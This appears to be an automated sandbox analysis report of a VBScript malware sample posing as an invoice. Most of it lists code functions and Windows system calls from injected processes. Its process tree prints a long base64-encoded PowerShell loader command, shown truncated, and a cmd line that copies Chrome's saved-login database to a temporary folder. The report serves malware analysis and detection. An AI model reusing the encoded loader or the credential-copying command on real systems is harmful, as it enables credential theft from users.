Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0508D130	32_2_0508D130
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FE00A0	32_2_04FE00A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0500B1E0	32_2_0500B1E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FF51C0	32_2_04FF51C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0509E076	32_2_0509E076
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0502508C	32_2_0502508C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FDF113	32_2_04FDF113
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050A70F1	32_2_050A70F1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FDD2EC	32_2_04FDD2EC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050AF330	32_2_050AF330
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050A124C	32_2_050A124C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FE1380	32_2_04FE1380
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FFE310	32_2_04FFE310
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050AFD27	32_2_050AFD27
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050A7D4C	32_2_050A7D4C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FF3C60	32_2_04FF3C60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05002DB0	32_2_05002DB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FE0C12	32_2_04FE0C12
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0508FDF4	32_2_0508FDF4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FF9DD0	32_2_04FF9DD0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0509EC4C	32_2_0509EC4C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050A6C69	32_2_050A6C69
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050AEC60	32_2_050AEC60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05089C98	32_2_05089C98
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FF0D69	32_2_04FF0D69
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05008CDF	32_2_05008CDF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0500FCE0	32_2_0500FCE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050BACEB	32_2_050BACEB
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FEAD00	32_2_04FEAD00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FE2EE8	32_2_04FE2EE8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FF1EB2	32_2_04FF1EB2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050AFF63	32_2_050AFF63
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050AEFBF	32_2_050AEFBF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050A1FC6	32_2_050A1FC6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FF6FE0	32_2_04FF6FE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05032E48	32_2_05032E48
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05010E50	32_2_05010E50
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05090E6D	32_2_05090E6D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050A0EAD	32_2_050A0EAD
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050A9ED2	32_2_050A9ED2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FFCF00	32_2_04FFCF00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FF28C0	32_2_04FF28C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FF9870	32_2_04FF9870
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FD6868	32_2_04FD6868
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050AE9A6	32_2_050AE9A6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050359C0	32_2_050359C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FF3800	32_2_04FF3800
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0501E810	32_2_0501E810
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05090835	32_2_05090835
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FEE9A0	32_2_04FEE9A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0500B870	32_2_0500B870
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050AF872	32_2_050AF872
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05006882	32_2_05006882
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050698B2	32_2_050698B2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050A18DA	32_2_050A18DA
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050A78F3	32_2_050A78F3
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0502DB19	32_2_0502DB19
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050AFB2E	32_2_050AFB2E
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05064BC0	32_2_05064BC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050ACA13	32_2_050ACA13
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050AEA5B	32_2_050AEA5B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050AFA89	32_2_050AFA89
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0500FAA0	32_2_0500FAA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_04FF0B10	32_2_04FF0B10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0071E7C6	32_2_0071E7C6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_00702D90	32_2_00702D90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_00702D87	32_2_00702D87
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_00709E50	32_2_00709E50
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_00709E4F	32_2_00709E4F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_00702FB0	32_2_00702FB0
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 37_2_00000265BE730232	37_2_00000265BE730232
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 37_2_00000265BE72F036	37_2_00000265BE72F036
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 37_2_00000265BE7335CD	37_2_00000265BE7335CD
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 37_2_00000265BE726082	37_2_00000265BE726082
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 37_2_00000265BE72AB30	37_2_00000265BE72AB30
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 37_2_00000265BE72AB32	37_2_00000265BE72AB32
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 37_2_00000265BE72D912	37_2_00000265BE72D912
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 37_2_00000265BE727D02	37_2_00000265BE727D02

Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 04FDB910 appears 268 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 05025050 appears 36 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 0506EF10 appears 105 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 05037BE4 appears 89 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 0505E692 appears 79 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: String function: 1F03E692 appears 82 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: String function: 1F04EF10 appears 105 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: String function: 1F005050 appears 36 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: String function: 1EFBB910 appears 268 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: String function: 1F017BE4 appears 96 times

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002F00 NtCreateFile,LdrInitializeThunk,	27_2_1F002F00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002E50 NtCreateSection,LdrInitializeThunk,	27_2_1F002E50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002EB0 NtProtectVirtualMemory,LdrInitializeThunk,	27_2_1F002EB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002ED0 NtResumeThread,LdrInitializeThunk,	27_2_1F002ED0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002D10 NtQuerySystemInformation,LdrInitializeThunk,	27_2_1F002D10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002DA0 NtReadVirtualMemory,LdrInitializeThunk,	27_2_1F002DA0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	27_2_1F002DC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002C30 NtMapViewOfSection,LdrInitializeThunk,	27_2_1F002C30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002C50 NtUnmapViewOfSection,LdrInitializeThunk,	27_2_1F002C50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002CF0 NtDelayExecution,LdrInitializeThunk,	27_2_1F002CF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002B10 NtAllocateVirtualMemory,LdrInitializeThunk,	27_2_1F002B10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002B90 NtFreeVirtualMemory,LdrInitializeThunk,	27_2_1F002B90
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002BC0 NtQueryInformationToken,LdrInitializeThunk,	27_2_1F002BC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002A80 NtClose,LdrInitializeThunk,	27_2_1F002A80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F0029F0 NtReadFile,LdrInitializeThunk,	27_2_1F0029F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002F30 NtOpenDirectoryObject,	27_2_1F002F30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002FB0 NtSetValueKey,	27_2_1F002FB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002E00 NtQueueApcThread,	27_2_1F002E00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002E80 NtCreateProcessEx,	27_2_1F002E80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002EC0 NtQuerySection,	27_2_1F002EC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002D50 NtWriteVirtualMemory,	27_2_1F002D50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002C10 NtOpenProcess,	27_2_1F002C10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002C20 NtSetInformationFile,	27_2_1F002C20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F003C30 NtOpenProcessToken,	27_2_1F003C30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F003C90 NtOpenThread,	27_2_1F003C90
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002CD0 NtEnumerateKey,	27_2_1F002CD0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002B00 NtQueryValueKey,	27_2_1F002B00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002B20 NtQueryInformationProcess,	27_2_1F002B20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002B80 NtCreateKey,	27_2_1F002B80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002BE0 NtQueryVirtualMemory,	27_2_1F002BE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002A10 NtWriteFile,	27_2_1F002A10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002AA0 NtQueryInformationFile,	27_2_1F002AA0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F002AC0 NtEnumerateValueKey,	27_2_1F002AC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F0029D0 NtWaitForSingleObject,	27_2_1F0029D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F0038D0 NtGetContextThread,	27_2_1F0038D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F004570 NtSuspendThread,	27_2_1F004570
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F0034E0 NtCreateMutant,	27_2_1F0034E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_1F004260 NtSetContextThread,	27_2_1F004260
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050234E0 NtCreateMutant,LdrInitializeThunk,	32_2_050234E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022D10 NtQuerySystemInformation,LdrInitializeThunk,	32_2_05022D10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	32_2_05022DC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022C20 NtSetInformationFile,LdrInitializeThunk,	32_2_05022C20
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022C30 NtMapViewOfSection,LdrInitializeThunk,	32_2_05022C30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022CF0 NtDelayExecution,LdrInitializeThunk,	32_2_05022CF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022F00 NtCreateFile,LdrInitializeThunk,	32_2_05022F00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022FB0 NtSetValueKey,LdrInitializeThunk,	32_2_05022FB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022E50 NtCreateSection,LdrInitializeThunk,	32_2_05022E50
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050229F0 NtReadFile,LdrInitializeThunk,	32_2_050229F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022B00 NtQueryValueKey,LdrInitializeThunk,	32_2_05022B00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022B10 NtAllocateVirtualMemory,LdrInitializeThunk,	32_2_05022B10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022B80 NtCreateKey,LdrInitializeThunk,	32_2_05022B80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022B90 NtFreeVirtualMemory,LdrInitializeThunk,	32_2_05022B90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022BC0 NtQueryInformationToken,LdrInitializeThunk,	32_2_05022BC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022A10 NtWriteFile,LdrInitializeThunk,	32_2_05022A10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022A80 NtClose,LdrInitializeThunk,	32_2_05022A80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022AC0 NtEnumerateValueKey,LdrInitializeThunk,	32_2_05022AC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05024570 NtSuspendThread,	32_2_05024570
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05024260 NtSetContextThread,	32_2_05024260
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022D50 NtWriteVirtualMemory,	32_2_05022D50
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022DA0 NtReadVirtualMemory,	32_2_05022DA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022C10 NtOpenProcess,	32_2_05022C10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05023C30 NtOpenProcessToken,	32_2_05023C30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022C50 NtUnmapViewOfSection,	32_2_05022C50
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05023C90 NtOpenThread,	32_2_05023C90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022CD0 NtEnumerateKey,	32_2_05022CD0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022F30 NtOpenDirectoryObject,	32_2_05022F30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022E00 NtQueueApcThread,	32_2_05022E00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022E80 NtCreateProcessEx,	32_2_05022E80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022EB0 NtProtectVirtualMemory,	32_2_05022EB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022EC0 NtQuerySection,	32_2_05022EC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022ED0 NtResumeThread,	32_2_05022ED0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050229D0 NtWaitForSingleObject,	32_2_050229D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_050238D0 NtGetContextThread,	32_2_050238D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022B20 NtQueryInformationProcess,	32_2_05022B20
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022BE0 NtQueryVirtualMemory,	32_2_05022BE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_05022AA0 NtQueryInformationFile,	32_2_05022AA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0071A350 NtCreateFile,	32_2_0071A350
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0071A400 NtReadFile,	32_2_0071A400
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0071A480 NtClose,	32_2_0071A480
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0071A530 NtAllocateVirtualMemory,	32_2_0071A530
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0071A3FA NtReadFile,	32_2_0071A3FA
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0071A47A NtClose,	32_2_0071A47A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0071A52A NtAllocateVirtualMemory,	32_2_0071A52A
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 37_2_00000265BE730232 NtCreateFile,NtWriteFile,	37_2_00000265BE730232

Source: WWVN_INVOICE_8363567453.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: WWVN_INVOICE_8363567453.vbs

ReversingLabs: Detection: 24%

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E9C.tmp" "c:\Users\user\AppData\Local\Temp\gkb1wfd4\CSC1FB6CDA7423C41F280B0C76B8C389BB7.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
